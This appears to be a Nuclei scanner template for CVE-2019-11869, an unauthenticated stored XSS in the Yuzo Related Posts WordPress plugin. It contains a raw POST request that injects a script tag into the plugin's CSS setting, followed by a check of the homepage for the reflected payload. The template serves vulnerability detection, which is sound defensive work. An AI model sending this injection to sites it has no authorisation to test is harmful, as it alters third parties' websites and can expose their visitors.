47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
id: CVE-2019-11869
|
|
|
|
info:
|
|
name: Yuzo Related Posts plugin XSS
|
|
author: ganofins
|
|
severity: medium
|
|
description: |
|
|
The Yuzo Related Posts plugin before 5.12.94 for WordPress has XSS
|
|
because it mistakenly expects that is_admin() verifies that the
|
|
request comes from an admin user (it actually only verifies that the
|
|
request is for an admin page). An unauthenticated attacker can inject
|
|
a payload into the plugin settings, such as the
|
|
yuzo_related_post_css_and_style setting.
|
|
|
|
reference:
|
|
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
|
|
- https://wpscan.com/vulnerability/9254
|
|
tags: cve,cve2019,wordpress,wp-plugin,xss
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.10
|
|
cve-id: CVE-2019-11869
|
|
cwe-id: CWE-79
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
yuzo_related_post_css_and_style=</style><script>alert(0);</script>
|
|
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2, "<script>alert(0);</script>")'
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(tolower(all_headers_2), 'text/html')" |